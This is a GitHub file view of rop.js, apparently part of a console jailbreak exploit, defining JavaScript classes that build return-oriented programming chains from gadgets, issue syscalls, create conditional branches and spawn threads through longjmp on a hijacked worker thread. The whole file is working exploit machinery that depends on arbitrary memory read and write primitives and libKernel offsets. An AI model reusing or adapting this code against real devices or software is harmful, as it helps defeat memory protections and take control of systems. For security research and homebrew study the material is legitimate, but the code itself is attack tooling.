-
Notifications
You must be signed in to change notification settings - Fork 29
/
rop.js
322 lines (274 loc) · 10.2 KB
/
rop.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
class rop {
constructor(stack_size = 0x40000, reserved_stack = 0x10000) {
this.stack_size = stack_size;
this.reserved_stack = reserved_stack;
this.stack_dwords = stack_size / 0x4;
this.reserved_stack_index = this.reserved_stack / 0x4;
this.stack_memory = p.malloc(this.stack_dwords + 0x2 + 0x200);
this.stack_array = this.stack_memory.backing;
this.stack_entry_point = this.stack_memory.add32(this.reserved_stack);
this.return_value = this.stack_memory.add32(this.stack_size);
this.initial_count = 0;
this.count = 0;
this.branches = this.return_value.add32(0x8);
this.branches_count = 0;
this.branch_types = {
EQUAL: 0x314500,
ABOVE: 0x314501,
BELOW: 0x314502,
GREATER: 0x314503,
LESSER: 0x314504,
};
}
set_initial_count(count) {
this.initial_count = count;
if (this.count == 0) {
this.count = this.initial_count;
}
}
clear() {
this.count = this.initial_count;
this.branches_count = 0;
for (let i = 0; i < this.stack_dwords; i++) {
this.stack_array[i] = 0x0;
}
}
increment_stack() {
return this.count++;
}
set_entry(index, value) {
if (value instanceof int64) {
this.stack_array[this.reserved_stack_index + index * 2] = value.low;
this.stack_array[this.reserved_stack_index + index * 2 + 1] = value.hi;
} else if (typeof (value) == 'number') {
this.stack_array[this.reserved_stack_index + index * 2] = value;
this.stack_array[this.reserved_stack_index + index * 2 + 1] = 0x0;
if (value > 0xFFFFFFFF) {
alert("you're trying to write a value exceeding 32-bits without using a int64 instance");
}
} else {
alert("You're trying to write a non number/non int64 value?");
}
}
/**
* performs `*rsp = value; rsp += 8;`
*/
push(value) {
this.set_entry(this.increment_stack(), value);
}
/**
* performs `*dest = value;` in chain
*/
push_write8(dest, value) {
this.push(gadgets["pop rdi"]);
this.push(dest);
this.push(gadgets["pop rsi"]);
this.push(value);
this.push(gadgets["mov [rdi], rsi"]);
}
/**
* performs `*dest = rax;` in chain
*/
write_result(dest) {
this.push(gadgets["pop rdi"]);
this.push(dest);
this.push(gadgets["mov [rdi], rax"]);
}
/**
* performs `*dest = eax;` in chain
*/
write_result4(dest) {
this.push(gadgets["pop rdi"]);
this.push(dest);
this.push(gadgets["mov [rdi], eax"]);
}
/**
* pushes rdi-r9 args on the stack for sysv calls
*/
push_sysv(rdi, rsi, rdx, rcx, r8, r9) {
if (rdi != undefined) {
this.push(gadgets["pop rdi"]);
this.push(rdi);
}
if (rsi != undefined) {
this.push(gadgets["pop rsi"]);
this.push(rsi);
}
if (rdx != undefined) {
this.push(gadgets["pop rdx"]);
this.push(rdx);
}
if (rcx != undefined) {
this.push(gadgets["pop rcx"]);
this.push(rcx);
}
if (r8 != undefined) {
this.push(gadgets["pop r8"]);
this.push(r8);
}
if (r9 != undefined) {
this.push(gadgets["pop r9"]);
this.push(r9);
}
}
/**
* helper function to add a standard sysv call to the chain.
*/
fcall(rip, rdi, rsi, rdx, rcx, r8, r9) {
this.push_sysv(rdi, rsi, rdx, rcx, r8, r9);
if (this.stack_entry_point.add32(this.count * 0x8).low & 0x8) {
this.push(gadgets["ret"]);
}
this.push(rip);
}
/**
* returns the current stack pointer.
*/
get_rsp() {
return this.stack_entry_point.add32(this.count * 0x8);
}
/**
* performs `rsp = dest;` in chain.
* can be used to 'jump' to different parts of a rop chain
*/
jmp_to_rsp(dest) {
this.push(gadgets["pop rsp"]);
this.push(dest);
}
/**
* function intended to build a reusable 'syscall' chain.
* Having a syscall return an error makes the stub perform a push rax, a call and a push rbp, this would usually corrupt the rop chain for later reuse
*/
self_healing_syscall(sysc, rdi, rsi, rdx, rcx, r8, r9) {
this.push_sysv(rdi, rsi, rdx, rcx, r8, r9);
let restore_point = this.get_rsp();
this.push(gadgets["ret"]);
this.push(gadgets["ret"]);
this.push(gadgets["ret"]);
if (this.stack_entry_point.add32(this.count * 0x8).low & 0x8) {
this.push(gadgets["ret"]);
restore_point.add32inplace(0x8);
}
this.push(syscalls[sysc]);
this.push_write8(restore_point, gadgets["ret"]);
this.push_write8(restore_point.add32(0x08), gadgets["ret"]);
this.push_write8(restore_point.add32(0x10), gadgets["ret"]);
this.push_write8(restore_point.add32(0x18), syscalls[sysc]);
}
/**
* returns the next available branch
*/
get_branch() {
return this.branches.add32(this.branches_count++ * 0x10);
}
/**
* prepares a branch in the rop chain, for 32b comparisons on [addr] <-> compare value
* use branch_types.XXXXX as type argument.
* returns a ptr ptr for the branchpoints
* use logical inversions for other jmp types. setne -> inverted sete, setbe -> inverted seta, ...
*/
create_branch(type, value_address, compare_value) {
let branch_addr = this.get_branch();
this.push(gadgets["pop rcx"]);
this.push(value_address);
this.push(gadgets["pop rax"]);
this.push(compare_value);
this.push(gadgets["cmp [rcx], eax"]);
this.push(gadgets["pop rax"]);
this.push(0);
if (type == this.branch_types.EQUAL) {
this.push(gadgets["sete al"]);
} else if (type == this.branch_types.ABOVE) {
this.push(gadgets["seta al"]);
} else if (type == this.branch_types.BELOW) {
this.push(gadgets["setb al"]);
} else if (type == this.branch_types.GREATER) {
this.push(gadgets["setg al"]);
} else if (type == this.branch_types.LESSER) {
this.push(gadgets["setl al"]);
} else {
alert("illegal branch type.");
}
this.push(gadgets["shl rax, 3"]);
this.push(gadgets["pop rdx"]);
this.push(branch_addr);
this.push(gadgets["add rax, rdx"]);
this.push(gadgets["mov rax, [rax]"]);
this.push(gadgets["pop rdi"]);
let branch_pointer_pointer_idx = this.increment_stack();
this.push(gadgets["mov [rdi], rax"]);
this.push(gadgets["pop rsp"]);
let branch_pointer = this.get_rsp();
this.increment_stack();
this.set_entry(branch_pointer_pointer_idx, branch_pointer);
return branch_addr;
}
/**
* finalizes a branch by setting the destination stack pointers.
* swap met and not met args if trying for an inverted jmp type.
*/
set_branch_points(branch_addr, rsp_condition_met, rsp_condition_not_met) {
p.write8(branch_addr.add32(0x0), rsp_condition_not_met);
p.write8(branch_addr.add32(0x8), rsp_condition_met);
}
/**
* performs (*address)++; in chain
*/
increment_dword(address) {
this.push(gadgets["pop rax"]);
this.push(address);
this.push(gadgets["inc dword [rax]"]);
}
}
//extension of the generic rop class intended to be used with the hijacked worker thread.
class worker_rop extends rop {
constructor(stack_size, reserved_stack) {
super(stack_size, reserved_stack);
p.pre_chain(this);
}
clear() {
super.clear();
p.pre_chain(this);
}
async call(rip, rdi, rsi, rdx, rcx, r8, r9) {
this.fcall(rip, rdi, rsi, rdx, rcx, r8, r9);
this.write_result(this.return_value);
await this.run();
return p.read8(this.return_value);
}
async syscall(sysc, rdi, rsi, rdx, rcx, r8, r9) {
return await this.call(syscalls[sysc], rdi, rsi, rdx, rcx, r8, r9);
}
async run() {
await p.launch_chain(this);
this.clear();
}
}
class thread_rop extends rop {
constructor(name = "rop_thread", stack_size, reserved_stack) {
super(stack_size, reserved_stack);
//we longjmp into the ropchain, longjmp overites the first entry stack entry with its own saved 'return address' this requires us to skip an entry.
this.set_initial_count(1);
//prepare lonjmp context
p.write8(this.stack_memory, gadgets["ret"]); //ret address
p.write8(this.stack_memory.add32(0x08), 0x0); //rbx
p.write8(this.stack_memory.add32(0x10), this.stack_entry_point); //rsp
p.write8(this.stack_memory.add32(0x18), 0x0); //rbp
p.write8(this.stack_memory.add32(0x20), 0x0); //r12
p.write8(this.stack_memory.add32(0x28), 0x0); //r13
p.write8(this.stack_memory.add32(0x30), 0x0); //r14
p.write8(this.stack_memory.add32(0x38), 0x0); //r15
p.write4(this.stack_memory.add32(0x40), 0x37F); //fpu control word
p.write4(this.stack_memory.add32(0x44), 0x9FE0); //mxcsr
p.writestr(this.stack_memory.add32(0x50), name); //thr name
}
/**
* returns created pthread_t as int64
*/
async spawn_thread() {
//add pthread_exit((void*)0x44414544); -> "DEAD"
this.fcall(libKernelBase.add32(OFFSET_lk_pthread_exit), 0x44414544);
await chain.call(libKernelBase.add32(OFFSET_lk_pthread_create_name_np), this.stack_memory.add32(0x48), 0x0, libSceLibcInternalBase.add32(OFFSET_lc_longjmp), this.stack_memory, this.stack_memory.add32(0x50));
return p.read8(this.stack_memory.add32(0x48));
}
}